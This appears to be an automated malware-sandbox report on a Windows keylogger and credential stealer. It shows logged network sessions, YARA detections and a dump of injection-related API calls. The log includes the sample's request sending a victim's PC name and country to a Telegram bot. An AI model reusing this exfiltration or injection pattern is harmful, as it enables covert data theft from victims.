                                                                                                                                                              2025-01-08 15:33:18 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              7192.168.2.449904188.114.97.34437492C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2025-01-08 15:33:19 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              2025-01-08 15:33:19 UTC861INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 08 Jan 2025 15:33:19 GMT
                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                              Content-Length: 362
                                                                                                                                                              Connection: close
                                                                                                                                                              Age: 1665188
                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                              cf-cache-status: HIT
                                                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gssEtJxRtycUxMSfrV0AchmaL%2Fw6M6b5PkbI%2B%2BHnSx81qv0cvkSjTvbCo%2B7lE9nGCJ6NPYI0RsGr891REiau6FSt%2BSRRlJlKtFMeI58KJim1hYFgp08jipzTLmOsRvCCPr5d4m%2FV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8fed3ecc889c0f84-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1663&min_rtt=1628&rtt_var=636&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1793611&cwnd=244&unsent_bytes=0&cid=c073b655a24c6c81&ts=176&x=0"
                                                                                                                                                              2025-01-08 15:33:19 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              8192.168.2.449915188.114.97.34437492C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2025-01-08 15:33:20 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              2025-01-08 15:33:20 UTC855INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 08 Jan 2025 15:33:20 GMT
                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                              Content-Length: 362
                                                                                                                                                              Connection: close
                                                                                                                                                              Age: 1665190
                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                              cf-cache-status: HIT
                                                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nqXrTgDy5Fn06lsS9nLWezohY7GJ3eQuB0Vcaun5VDanWyoIRJ6edZilMYoKSccWZNHUCbzWCmjenxHpB5FsXGOaBfFDsgV3RrQx%2FX3VW50dSV%2FQ1XPezMhq47x6h73BoAOc0n7%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8fed3ed5cf9119a1-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2035&min_rtt=2031&rtt_var=770&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1413359&cwnd=118&unsent_bytes=0&cid=9121fc298a5cc52b&ts=154&x=0"
                                                                                                                                                              2025-01-08 15:33:20 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              9192.168.2.449920149.154.167.2204437492C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2025-01-08 15:33:21 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20and%20Time:%2009/01/2025%20/%2000:36:30%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724536%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                                              Host: api.telegram.org
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              2025-01-08 15:33:21 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.18.0
                                                                                                                                                              Date: Wed, 08 Jan 2025 15:33:21 GMT
                                                                                                                                                              Content-Type: application/json
                                                                                                                                                              Content-Length: 55
                                                                                                                                                              Connection: close
                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                              2025-01-08 15:33:21 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                                              Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                                              Statistics

                                                                                                                                                              CPU Usage

                                                                                                                                                              Click to jump to process

                                                                                                                                                              Memory Usage

                                                                                                                                                              Click to jump to process

                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                              Behavior

                                                                                                                                                              Click to jump to process

                                                                                                                                                              System Behavior

                                                                                                                                                              General

                                                                                                                                                              Target ID:0
                                                                                                                                                              Start time:10:31:54
                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                              Path:C:\Users\user\Desktop\pbCN4g6sN5.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Users\user\Desktop\pbCN4g6sN5.exe"
                                                                                                                                                              Imagebase:0xa20000
                                                                                                                                                              File size:816'128 bytes
                                                                                                                                                              MD5 hash:7D88E5BAD194E89ADA135543169DA996
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2383848177.0000000004B30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2376499978.0000000002551000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:5
                                                                                                                                                              Start time:10:32:33
                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                                                                              Imagebase:0xa60000
                                                                                                                                                              File size:42'064 bytes
                                                                                                                                                              MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.2903836633.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2903836633.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:false

                                                                                                                                                              Disassembly

                                                                                                                                                              Reset < >

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:21.5%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                Signature Coverage:5.2%
                                                                                                                                                                Total number of Nodes:324
                                                                                                                                                                Total number of Limit Nodes:14
                                                                                                                                                                execution_graph 69667 8eae508 69668 8eae548 ResumeThread 69667->69668 69670 8eae579 69668->69670 69290 98d01c 69291 98d034 69290->69291 69292 98d08e 69291->69292 69297 587ee28 69291->69297 69301 587fb79 69291->69301 69306 587ee19 69291->69306 69310 587ce04 69291->69310 69298 587ee4e 69297->69298 69299 587ce04 2 API calls 69298->69299 69300 587ee6f 69299->69300 69300->69292 69302 587fb82 69301->69302 69303 587fbe7 69302->69303 69315 587fd10 69302->69315 69320 587fd00 69302->69320 69303->69292 69307 587ee28 69306->69307 69308 587ce04 2 API calls 69307->69308 69309 587ee6f 69308->69309 69309->69292 69311 587ce0f 69310->69311 69312 587fbe7 69311->69312 69313 587fd00 2 API calls 69311->69313 69314 587fd10 2 API calls 69311->69314 69312->69292 69313->69312 69314->69312 69316 587fd24 69315->69316 69325 587fdc8 69316->69325 69328 587fdb8 69316->69328 69317 587fdb0 69317->69303 69321 587fd10 69320->69321 69323 587fdb8 2 API calls 69321->69323 69324 587fdc8 2 API calls 69321->69324 69322 587fdb0 69322->69303 69323->69322 69324->69322 69326 587fdd9 69325->69326 69331 5971059 69325->69331 69326->69317 69329 587fdd9 69328->69329 69330 5971059 2 API calls 69328->69330 69329->69317 69330->69329 69335 5971080 69331->69335 69339 5971070 69331->69339 69332 597106a 69332->69326 69336 59710c2 69335->69336 69338 59710c9 69335->69338 69337 597111a CallWindowProcW 69336->69337 69336->69338 69337->69338 69338->69332 69340 5971080 69339->69340 69341 597111a CallWindowProcW 69340->69341 69342 59710c9 69340->69342 69341->69342 69342->69332 69343 5976410 69344 5976432 69343->69344 69347 587597b 69343->69347 69351 5875988 69343->69351 69349 58759b3 69347->69349 69348 5875c79 69348->69344 69349->69348 69355 587a340 69349->69355 69353 58759b3 69351->69353 69352 5875c79 69352->69344 69353->69352 69354 587a340 CreateWindowExW 69353->69354 69354->69352 69356 587a371 69355->69356 69357 587a395 69356->69357 69360 587a4f0 69356->69360 69364 587a500 69356->69364 69357->69348 69361 587a500 69360->69361 69362 587a547 69361->69362 69368 5878be0 69361->69368 69362->69357 69365 587a50d 69364->69365 69366 587a547 69365->69366 69367 5878be0 CreateWindowExW 69365->69367 69366->69357 69367->69366 69369 5878beb 69368->69369 69371 587b258 69369->69371 69372 587a674 69369->69372 69371->69371 69373 587a67f 69372->69373 69377 587d020 69373->69377 69383 587d010 69373->69383 69374 587b301 69374->69371 69379 587d152 69377->69379 69380 587d051 69377->69380 69378 587d05d 69378->69374 69379->69374 69380->69378 69388 587dd41 69380->69388 69392 587dd50 69380->69392 69385 587d01a 69383->69385 69384 587d05d 69384->69374 69385->69384 69386 587dd41 CreateWindowExW 69385->69386 69387 587dd50 CreateWindowExW 69385->69387 69386->69384 69387->69384 69389 587dd50 69388->69389 69390 587de2a 69389->69390 69396 587ec64 69389->69396 69393 587dd7b 69392->69393 69394 587de2a 69393->69394 69395 587ec64 CreateWindowExW 69393->69395 69395->69394 69397 587ec6f CreateWindowExW 69396->69397 69399 587ec1a 69396->69399 69400 587ed94 69397->69400 69399->69390 69526 5870040 69527 5870065 69526->69527 69535 587282b 69527->69535 69542 587284c 69527->69542 69548 58729d8 69527->69548 69528 5870df6 69529 5870076 69529->69528 69533 597d560 GetCurrentThreadId 69529->69533 69534 597d54f GetCurrentThreadId 69529->69534 69533->69529 69534->69529 69536 587286d 69535->69536 69537 5872846 69535->69537 69536->69529 69554 5872ae0 69537->69554 69562 5872adf 69537->69562 69570 5872b79 69537->69570 69538 5872a5d 69538->69529 69543 5872855 69542->69543 69545 5872ae0 CreateWindowExW 69543->69545 69546 5872adf CreateWindowExW 69543->69546 69547 5872b79 CreateWindowExW 69543->69547 69544 5872a5d 69544->69529 69545->69544 69546->69544 69547->69544 69549 58729f9 69548->69549 69551 5872ae0 CreateWindowExW 69549->69551 69552 5872adf CreateWindowExW 69549->69552 69553 5872b79 CreateWindowExW 69549->69553 69550 5872a5d 69550->69529 69551->69550 69552->69550 69553->69550 69555 5872b01 69554->69555 69556 5872b10 69555->69556 69558 5872b87 CreateWindowExW 69555->69558 69576 5872b88 69555->69576 69557 5872b46 69556->69557 69561 5872b88 CreateWindowExW 69556->69561 69581 5872b87 69556->69581 69557->69538 69558->69556 69561->69556 69563 5872b01 69562->69563 69564 5872b10 69563->69564 69566 5872b87 CreateWindowExW 69563->69566 69567 5872b88 CreateWindowExW 69563->69567 69565 5872b46 69564->69565 69568 5872b87 CreateWindowExW 69564->69568 69569 5872b88 CreateWindowExW 69564->69569 69565->69538 69566->69564 69567->69564 69568->69564 69569->69564 69571 5872b82 69570->69571 69572 5872b10 69570->69572 69571->69538 69573 5872b46 69572->69573 69574 5872b87 CreateWindowExW 69572->69574 69575 5872b88 CreateWindowExW 69572->69575 69573->69538 69574->69572 69575->69572 69577 5872bbb 69576->69577 69578 5872c3c 69577->69578 69579 587597b CreateWindowExW 69577->69579 69580 5875988 CreateWindowExW 69577->69580 69578->69556 69579->69578 69580->69578 69582 5872bbb 69581->69582 69583 5872c3c 69582->69583 69584 587597b CreateWindowExW 69582->69584 69585 5875988 CreateWindowExW 69582->69585 69583->69556 69584->69583 69585->69583 69671 587ac60 DuplicateHandle 69672 587acf6 69671->69672 69401 8ead760 69402 8ead7a8 WriteProcessMemory 69401->69402 69404 8ead7ff 69402->69404 69586 8ead420 69587 8ead460 VirtualAllocEx 69586->69587 69589 8ead49d 69587->69589 69590 8eae2a0 69591 8eae2e5 Wow64SetThreadContext 69590->69591 69593 8eae32d 69591->69593 69594 8eae720 69595 8eae8ab 69594->69595 69596 8eae746 69594->69596 69596->69595 69598 8eadad8 69596->69598 69599 8eae9a0 PostMessageW 69598->69599 69600 8eaea0c 69599->69600 69600->69596 69673 8eae000 69674 8eae048 VirtualProtectEx 69673->69674 69676 8eae086 69674->69676 69601 77fbdb0 69602 77fbdc4 69601->69602 69603 77fbe00 69602->69603 69613 77fcf01 69602->69613 69604 77fbe3d 69603->69604 69617 8ea3a47 69603->69617 69621 8ea2322 69603->69621 69625 8ea2ab7 69603->69625 69629 8ea21bd 69603->69629 69633 8ea2c9d 69603->69633 69637 8ea200b 69603->69637 69641 8ea2b0c 69603->69641 69614 77fceab VirtualProtect 69613->69614 69616 77fcf06 69613->69616 69615 77fceca 69614->69615 69615->69602 69616->69602 69645 8ea3f68 69617->69645 69648 8ea3f60 69617->69648 69618 8ea3a58 69623 8ea3f68 VirtualProtect 69621->69623 69624 8ea3f60 VirtualProtect 69621->69624 69622 8ea2333 69623->69622 69624->69622 69627 8ea3f68 VirtualProtect 69625->69627 69628 8ea3f60 VirtualProtect 69625->69628 69626 8ea2acb 69627->69626 69628->69626 69631 8ea3f68 VirtualProtect 69629->69631 69632 8ea3f60 VirtualProtect 69629->69632 69630 8ea21e1 69631->69630 69632->69630 69635 8ea3f68 VirtualProtect 69633->69635 69636 8ea3f60 VirtualProtect 69633->69636 69634 8ea2cb7 69635->69634 69636->69634 69639 8ea3f68 VirtualProtect 69637->69639 69640 8ea3f60 VirtualProtect 69637->69640 69638 8ea201c 69639->69638 69640->69638 69643 8ea3f68 VirtualProtect 69641->69643 69644 8ea3f60 VirtualProtect 69641->69644 69642 8ea2b4a 69643->69642 69644->69642 69646 8ea3fb0 VirtualProtect 69645->69646 69647 8ea3fea 69646->69647 69647->69618 69649 8ea3fb0 VirtualProtect 69648->69649 69650 8ea3fea 69649->69650 69650->69618 69651 a1c9f0 69654 a1ca02 69651->69654 69655 a1b51c 69654->69655 69659 a1b534 69654->69659 69656 a1d8b8 CheckRemoteDebuggerPresent 69655->69656 69658 a1d93e 69656->69658 69658->69654 69660 a1da40 OutputDebugStringW 69659->69660 69662 a1dabf 69660->69662 69662->69654 69663 8eacd38 69664 8eacd7d Wow64GetThreadContext 69663->69664 69666 8eacdc5 69664->69666 69405 5871090 69408 58710a0 69405->69408 69406 5871a82 69407 58722e3 69406->69407 69463 6d020f0 69406->69463 69467 6d02100 69406->69467 69408->69406 69408->69407 69418 597f020 69408->69418 69422 597f010 69408->69422 69427 597d560 69408->69427 69438 597d54f 69408->69438 69449 5a116aa 69408->69449 69453 5a116e8 69408->69453 69459 5a116b8 69408->69459 69420 587597b CreateWindowExW 69418->69420 69421 5875988 CreateWindowExW 69418->69421 69419 597f033 69419->69408 69420->69419 69421->69419 69423 597f020 69422->69423 69425 587597b CreateWindowExW 69423->69425 69426 5875988 CreateWindowExW 69423->69426 69424 597f033 69424->69408 69425->69424 69426->69424 69429 597d575 69427->69429 69428 597d5fb 69436 597d560 GetCurrentThreadId 69428->69436 69437 597d54f GetCurrentThreadId 69428->69437 69429->69428 69431 597d630 69429->69431 69430 597d605 69430->69408 69435 597d734 69431->69435 69471 597ba4c 69431->69471 69433 597d758 69434 597ba4c GetCurrentThreadId 69433->69434 69434->69435 69435->69408 69436->69430 69437->69430 69441 597d553 69438->69441 69439 597d5fb 69447 597d560 GetCurrentThreadId 69439->69447 69448 597d54f GetCurrentThreadId 69439->69448 69440 597d605 69440->69408 69441->69439 69442 597d630 69441->69442 69443 597ba4c GetCurrentThreadId 69442->69443 69446 597d734 69442->69446 69444 597d758 69443->69444 69445 597ba4c GetCurrentThreadId 69444->69445 69445->69446 69446->69408 69447->69440 69448->69440 69475 5a11af1 69449->69475 69480 5a11b00 69449->69480 69450 5a116d7 69450->69408 69454 5a116a6 69453->69454 69455 5a116f6 69453->69455 69457 5a11af1 CreateWindowExW 69454->69457 69458 5a11b00 CreateWindowExW 69454->69458 69456 5a116d7 69456->69408 69457->69456 69458->69456 69460 5a116d7 69459->69460 69461 5a11af1 CreateWindowExW 69459->69461 69462 5a11b00 CreateWindowExW 69459->69462 69460->69408 69461->69460 69462->69460 69464 6d02132 69463->69464 69485 6d09156 69464->69485 69465 6d0790e 69465->69407 69468 6d02132 69467->69468 69470 6d09156 DeleteFileW 69468->69470 69469 6d0790e 69469->69407 69470->69469 69472 597ba57 69471->69472 69473 597da7f GetCurrentThreadId 69472->69473 69474 597da6a 69472->69474 69473->69474 69474->69433 69476 5a11b2e 69475->69476 69478 587597b CreateWindowExW 69476->69478 69479 5875988 CreateWindowExW 69476->69479 69477 5a11b64 69477->69450 69478->69477 69479->69477 69481 5a11b2e 69480->69481 69483 587597b CreateWindowExW 69481->69483 69484 5875988 CreateWindowExW 69481->69484 69482 5a11b64 69482->69450 69483->69482 69484->69482 69489 6d092ba 69485->69489 69493 6d092e8 69485->69493 69486 6d0917b 69486->69465 69490 6d092b6 69489->69490 69490->69489 69497 6d09d1d 69490->69497 69491 6d095a4 69491->69486 69494 6d092fe 69493->69494 69496 6d09d1d DeleteFileW 69494->69496 69495 6d095a4 69495->69486 69496->69495 69498 6d09cdd 69497->69498 69499 6d09d2f 69497->69499 69498->69491 69499->69498 69500 6d09e12 DeleteFileW 69499->69500 69501 6d09e3f 69500->69501 69501->69491 69502 5878290 69506 5878388 69502->69506 69511 5878380 69502->69511 69503 587829f 69507 58783bc 69506->69507 69508 5878399 69506->69508 69507->69503 69508->69507 69509 58785c0 GetModuleHandleW 69508->69509 69510 58785ed 69509->69510 69510->69503 69512 58783bc 69511->69512 69514 5878399 69511->69514 69512->69503 69513 58785c0 GetModuleHandleW 69515 58785ed 69513->69515 69514->69512 69514->69513 69515->69503 69677 8ea6291 69678 8ea62d3 69677->69678 69679 8ea6701 69678->69679 69681 8ea8df0 69678->69681 69683 8ea8e17 69681->69683 69682 8ea8edb 69682->69678 69683->69682 69685 8eab178 69683->69685 69686 8eab1f7 CreateProcessAsUserW 69685->69686 69688 8eab2f8 69686->69688 69516 587aa18 69517 587aa5e GetCurrentProcess 69516->69517 69519 587aab0 GetCurrentThread 69517->69519 69520 587aaa9 69517->69520 69521 587aae6 69519->69521 69522 587aaed GetCurrentProcess 69519->69522 69520->69519 69521->69522 69525 587ab23 69522->69525 69523 587ab4b GetCurrentThreadId 69524 587ab7c 69523->69524 69525->69523

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 05A1DBE8 Relevance: 11.0, Strings: 8, Instructions: 967COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
